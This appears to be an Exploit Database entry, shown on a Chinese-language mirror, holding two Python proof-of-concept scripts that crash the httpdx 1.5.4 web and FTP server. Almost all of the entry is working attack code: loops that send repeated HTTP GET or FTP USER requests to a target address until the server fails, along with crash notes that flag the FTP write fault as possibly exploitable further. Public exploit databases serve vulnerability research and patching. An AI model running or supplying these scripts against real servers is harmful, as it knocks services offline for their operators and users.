httpdx 1.5.4 – Multiple Denial of Service Vulnerabilities (http-ftp) (PoC)

• Exploit Database
• 9 阅读

• 作者： Dr_IDE
  日期： 2010-08-18
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/14683/

• #!/usr/bin/env python
  
  ###########################################################################
  #
  # Title: 	httpdx v1.5.4 Remote HTTP Server DoS (0day)
  # By:		Dr_IDE
  # Tested:	XPSP3
  # Download:	http://httpdx.sourceforge.net
  # Note:		Server will totally crash if only running the EXE
  # Note:		Get a "ffs what happened?" message if running via BAT
  #
  ############################################################################
  #
  # Debugging Notes: This may not be exploitable as it dumps on a read operation. 
  # Upon crash throws: Access violation when reading [00001238]
  #
  ############################################################################
  
  import socket, sys
  
  payload = ("GET / HTTP/1.1\r\n\r\n");
  x=1;
  
  try:
  	while (x < 2048):
  		s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  		print ("[*] Connecting to httpdx server.");
  		s.connect((sys.argv[1], 80));
  		print ("\n[*] Sending command.\n");
  		s.send(payload);
  		s.close();
  		x = x+1;
  
  except:
  	print ("[*] Success! We crashed the server in %d attempts." % x);
  	print ("[i] [pocoftheday.blogspot.com]");
  
  
  =====================================================================================
  
  #!/usr/bin/env python
  
  ###########################################################################
  #
  # Title: 	httpdx v1.5.4 Remote FTP Server DoS (0day)
  # By:		Dr_IDE
  # Tested:	XPSP3
  # Download:	http://httpdx.sourceforge.net
  # Note:		Server will totally crash if only running the EXE
  # Note:		Get a "ffs what happened?" message if running via BAT
  #
  ############################################################################
  #
  # Debugging Notes: This may be exploitable as it dumps on a write operation. 
  # Upon crash throws: Access violation when writing to [00230000]
  #
  ############################################################################
  
  import socket, sys
  
  payload = ("USER anonymous\r\n\r\n");
  x=1;
  
  try:
  	while (x < 2048):
  		s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  		print ("[*] Connecting to httpdx server.");
  		s.connect((sys.argv[1], 21));
  		print ("\n[*] Sending command.\n");
  		s.send(payload);
  		s.close();
  		x = x+1;
  
  except:
  	print ("[*] Success! We crashed the server in %d attempts." % x);
  	print ("[i] [pocoftheday.blogspot.com]");